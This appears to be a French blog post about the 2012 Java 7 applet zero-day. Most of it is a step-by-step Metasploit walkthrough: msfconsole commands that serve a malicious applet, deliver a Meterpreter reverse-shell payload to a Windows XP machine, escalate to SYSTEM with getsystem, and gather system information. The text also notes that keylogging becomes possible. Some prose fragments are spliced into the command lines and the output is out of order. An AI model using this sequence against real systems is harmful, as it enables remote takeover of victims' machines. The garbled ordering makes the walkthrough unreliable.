
D'après une première analyse d'Atif Mushtaq, l'exploit aurait fait sa première apparition sur un serveur chinois, le 26 août 2012. Et visiblement, ce n'est qu'une question de temps avant que d'autres personnes ne reprennent ses principes de base et se mettent à coder des variantes, dans le but de réaliser des attaques de plus grandes ampleurs.
Atif Mushtaq se demande également combien de temps il va falloir à Oracle pour proposer un patch, alors que nous sommes en plein mois d'août.
En attendant, voici un exemple d'utilisation de cette faille avec Metasploit, en prenant pour cible une machine Windows :
$ svn upEnsuite, il ne reste plus qu'à attendre qu'une personne se connecte au serveur infecté (http://192.168.1.100:80/foo), lancé précédemment avec Metasploit :
$ ./msfconsole
msf > use exploit/multi/browser/java_jre17_exec
msf > info
msf > set SRVHOST 192.168.1.100
msf > set SRVPORT 80
msf > set URIPATH /foo
msf > show targets
Exploit targets:
Id Name
-- ----
0 Generic (Java Payload)
1 Windows Universal
2 Linux x86
msf > set TARGET 1
msf > show payloads
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.1.100
msf > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.100:4444
[*] Using URL: http://192.168.1.100:80/foo
[*] Server started.
[*] 192.168.1.100 java_jre17_exec - Java 7 Applet Remote Code Execution handling requestOn ouvre une session à distance :
[*] 192.168.1.100 java_jre17_exec - Sending Applet.jar
[*] 192.168.1.100 java_jre17_exec - Sending Applet.jar
[*] Sending stage (752128 bytes) to 192.168.1.100
[*] Meterpreter session 2 opened (192.168.1.100:4444 -> 192.168.1.101:56567) at Mon Aug 27 18:13:08
msf > sessions -i 2On passe administrateur sur le poste Windows :
[*] Starting interaction with 2...
meterpreter > getsystemOn récupère quelques infos :
...got system (via technique 1).
meterpreter > sysinfoA ce stade là, on peut faire ce que l'on veut sur le système (capture d'écran, mise en place d'un keylogger...). Pour corriger cette faille, vous devez mettre à jour Java sur votre machine (quand les majs seront disponibles bien entendu).
Architecture : x86
Computer : xblade
System Language : fr_FR
OS : Windows XP (Build 2600, Service Pack 3).
Meterpreter : x86/win32